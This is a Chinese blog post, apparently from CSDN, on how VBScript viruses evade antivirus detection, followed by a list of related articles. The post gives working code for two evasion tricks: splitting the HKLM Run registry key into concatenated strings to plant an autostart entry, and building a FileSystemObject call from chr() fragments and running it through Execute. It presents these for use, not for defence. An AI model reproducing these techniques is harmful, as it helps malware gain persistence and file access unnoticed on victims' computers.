VBS脚本病毒如何躲过杀毒软件

最新推荐文章于 2018-12-13 14:06:21 发布
最新推荐文章于 2018-12-13 14:06:21 发布
阅读量1.1k 收藏 1
点赞数 1
分类专栏: 病毒程序 文章标签: 杀毒软件 脚本 防火墙 string
现在杀毒的对vbs相当敏感,只要发现对注册表的xx作,或使用vbs运行命令(加用户) 就可能被杀。下面谈2方法可以简单解决:

 

1.使用连接符"&" 如:
Set CURObj = CreateObject("WScript.Shell")
mhk="HK"&"LM/SOFT"&"WARE/Micr"&"osoft/Win"&"dows/Curren"&"tVersion/Run/"
CURObj.RegWrite ""&mhk&"internat.exe","internat.exe"

2.使用Execute函数(BY 动鲨 )

一些杀毒软件,如瑞星,他门会监视网页中的代码,一旦你创建了FSO或写注册表,即使是正常的脚本他也会报告危险,但是当年新欢乐时光也用了FSO怎么就没报警呢?原因是这个病毒使用Execute这个函数来躲过了防火墙,呵呵。病毒将这段声明代码转化为字符串,然后通过Execute(String)函数执行,举个例子
str="set fso=CreateObject( " & chr(34) & "scrip" & chr(116)& "ing.FileSystemObject"&chr(34)&")"
msgbox str
Execute str
将如上的代码放入test.vbs中就会被创建FSO,而部分杀毒软件就不会报警了。

 
Suncanoe
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
VBS脚本病毒特点及如何防范
10-01 1400
大家可以点击进入我的资源-最新最全的免费资源下载中找到相关资源    网络的流行,让我们的世界变得更加美好,但它也有让人不愉快的时候。当您收到一封主题为“I Love You”的邮件,用兴奋得几乎快发抖的鼠标去点击附件的时候;当您浏览一个信任的网站之后,发现打
对一个vbs脚本病毒病毒原理分析
09-01
主要介绍了对一个vbs脚本病毒病毒原理分析的相关资料,非常不错,具有参考借鉴价值,需要的朋友可以参考下
html文件的VBS脚本病毒清除软件vbs脚本代码批量去除批量处理工具
05-13
清除HTML文件中的vbs脚本病毒,解决360杀毒软件检测到html中包含vbs脚本病毒会地洞删除,而无法修复,开发此程序解决的问题就是能够批量的清除文件夹中所有html文件的VBS脚本,实测有效处理速度快,发送给客户源代码前通过此工具先处理一下,防止在客户机上面报毒,测试过多种杀毒软件都无法修复HTML文件都是直接隔离删除,因此开发了此程序给大家共享
VBScript.Encode打造的免杀木马
weixin_30782331的博客
06-20 117
SCRENC.EXE这是一个运行在DOS PROMAPT的命令工具,它使脚本设计者可以对最终的脚本进行编码,从而使 Web 主机和 Web 客户不能查看或修改它们的源代码。不过有一点需要注意的是加密后的程序要求用户的游览器必须使用Internet Explorer 5.0以上的版本。加完密后的脚本变成类似于如下的内容:     脚...
怎样防范vbs脚本病毒
persistence勿忘初心
12-13 2045
https://blog.csdn.net/persistencegoing/article/details/84376427 大早上,发现服务器被人攻击了,所有的 html 都被植入了一段 vbscript <!DOCTYPE html> <html>         <head>                 <me...
VBS编程打造自己的病毒专杀工具
靖海安澜阁
07-16 3195
VBS病毒应该来说还是挺流行的,其力量不可小觑啊!用VBS写一只普通病毒(蠕虫)没有什么难度,写病毒专杀工具也是没什么难度的。但在写出专杀工具前必须了解你要杀的这只病毒的一些信息……比如:病毒释放的文件,感染的文件,注册表与进程里的病毒信息等等。一、首先来看如何结束病毒进程,之前我在《两个简易VBS脚本结束进程与防止进程启动》给出了关于进程的一些操作方法。假如要结束的病毒进程为rund11
VBS编程打造自己的病毒专杀工具
hereson
04-11 1507
VBS病毒应该来说还是挺流行的,其力量不可小觑啊!用VBS写一只普通病毒(蠕虫)没有什么难度,写病毒专杀工具也是没什么难度的。但在写出专杀工具前必须了解你要杀的这只病毒的一些信息……比如:病毒释放的文件,感染的文件,注册表与进程里的病毒信息等等。 一、首先来看如何结束病毒进程,之前我在《两个简易VBS脚本结束进程与防止进程启动》给出了关于进程的一些操作方法。假如要结束的病毒进程为rund11...
VBS脚本编程经典教材.docx
03-14
VBS脚本编程经典教材 VBS脚本编程是一种Windows脚本,它的全称是Microsoft Visual Basic Script Editon(微软公司可视化BASIC脚本版)。VBS是Visual Basic的一个抽象子集,是系统内置的,用它编写的脚本代码不能...
WinCC常用C和VBS脚本.pdf
05-13
WinCC是西门子提供的一款用于监控和控制工业系统的软件,而C脚本VBS脚本是WinCC中支持的两种脚本语言,分别代表C语言风格的脚本和Visual Basic Scripting Edition(VBS)风格的脚本。 1. WinCC脚本基础 在WinCC...
基于ssm和vue的 家庭理财系统源码 家庭理财系统代码(高分毕设项目源码)
08-23
1. 家庭理财系统代码说明:经导师指导并认可通过的98分毕设项目代码。 2.适用对象:本代码学习资料适用于计算机、电子信息工程、数学等专业正在做毕设的学生,需要项目实战练习的学习者,也适用于课程设计、期末大作业。 3.技术栈:前端是vue,后端是ssm,项目代码都经过严格调试,代码没有任何bug! 4. 作者介绍:大厂码农,java领域创作者,阿里云开发社区乘风者计划专家博主,专注于大学生项目实战开发,文章底部有博主联系方式,更多优质系统、项目定制请私信。 5. 最新计算机软件毕业设计选题大全: https://blog.csdn.net/weixin_45630258/article/details/135901374
大数据湖体系规划与建设方案.pdf
08-23
大数据湖体系规划与建设方案.pdf
Kafka多租户消费:构建高效、安全的分布式消息处理
08-23
Kafka是一个分布式流处理平台,最初由LinkedIn公司开发,后来成为Apache软件基金会的一个顶级项目。Kafka主要用于构建实时数据管道和流处理应用程序。它能够高效地处理高吞吐量的数据流,并且具有很好的可扩展性、容错性和持久性。 以下是Kafka的一些关键特性: 1. **分布式系统**:Kafka通过多个代理(Broker)组成集群,支持数据的分布式存储和并行处理。 2. **发布-订阅模型**:Kafka使用发布-订阅模式,生产者(Producer)将消息发布到主题(Topic),消费者(Consumer)从主题订阅消息。 3. **高吞吐量**:Kafka设计用于处理高吞吐量的数据流,每秒可以处理数百万条消息。 4. **持久性**:Kafka将数据存储在磁盘上,支持数据的持久化,即使在系统故障的情况下也不会丢失数据。 5. **可扩展性**:Kafka可以通过增加更多的Broker来水平扩展,以处理更大的数据量。 6. **容错性**:Kafka支持数据的副本(Replication),确保数据的高可用性和容错性。 7. **实时性**:Kafka设计用于实时数据处理
containerd的配置文件
最新发布
08-23
【kubernetes】环境准备及K8S安装【最新完整版】 1./etc/containerd/ 2.更改真实对应的harbor镜像地址ip
海康网络设备 sdk开发
08-23
海康网络设备 sdk开发
基于springboot和vue的 网上订餐系统源码 (优秀毕业设计源码)
08-23
1. 网上订餐系统代码说明:经导师指导并认可通过的98分毕设项目代码。 2.适用对象:本代码学习资料适用于计算机、电子信息工程、数学等专业正在做毕设的学生,需要项目实战练习的学习者,也适用于课程设计、期末大作业。 3.技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 4. 作者介绍:大厂码农,java领域创作者,阿里云开发社区乘风者计划专家博主,专注于大学生项目实战开发,文章底部有博主联系方式,更多优质系统、项目定制请私信。 5. 最新计算机软件毕业设计选题大全: https://blog.csdn.net/weixin_45630258/article/details/135901374
精益与智能工厂三年规划.pdf
08-23
精益与智能工厂三年规划.pdf
weixin028小说阅读器+ssm.zip
08-23
当今时代,是信息大爆炸的时代,人们每天都能接收到数不清的各类信息,其形式不仅包含传统的文字和图片,还有视频、音频等多阅读资料源也较以往增长了太多。因此市面上各种阅读类应用的用户体验参差不齐,所以设计一个通用的阅读器,小说阅读器小程序采用java开发语言、以及Mysql数据库等技术。系统主要分为管理员和用户二部分,管理员服务端:首页、个人中心、用户管理、小说分类管理、书城管理、订单信息管理、小说资讯管理、小说章节管理、书圈、系统管理,用户客户端;首页、书城、小说资讯、书圈、我的等功能,基本上实现了整个小说阅读器小程序信息管理的过程。本系统在一般小说阅读器小程序的基础上增加了最新信息的功能方便用户快速浏览,是一个高效的、动态的、相互友好的小说阅读器小程序。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值